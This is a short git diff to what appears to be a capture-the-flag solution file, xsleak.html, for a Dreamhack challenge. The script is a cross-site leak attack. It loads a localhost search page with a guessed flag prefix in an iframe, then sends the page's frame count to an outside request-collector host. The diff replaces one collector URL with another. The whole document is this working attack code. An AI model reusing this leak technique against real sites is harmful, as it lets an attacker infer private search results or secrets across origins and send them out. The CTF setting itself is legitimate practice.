--- a/xsleak.html
+++ b/xsleak.html
@@ -4,6 +4,6 @@
 const iframe = document.getElementById("iframe");
 iframe.src = "http://localhost:8000/search?query=DH{";
 iframe.onload = () => {
-    img.src = `https://en7007nj6j2rg.x.pipedream.net/${iframe.contentWindow.frames.length}`;
+    img.src = `https://buxqcnq.request.dreamhack.games/${iframe.contentWindow.frames.length}`;
 };
 </script>
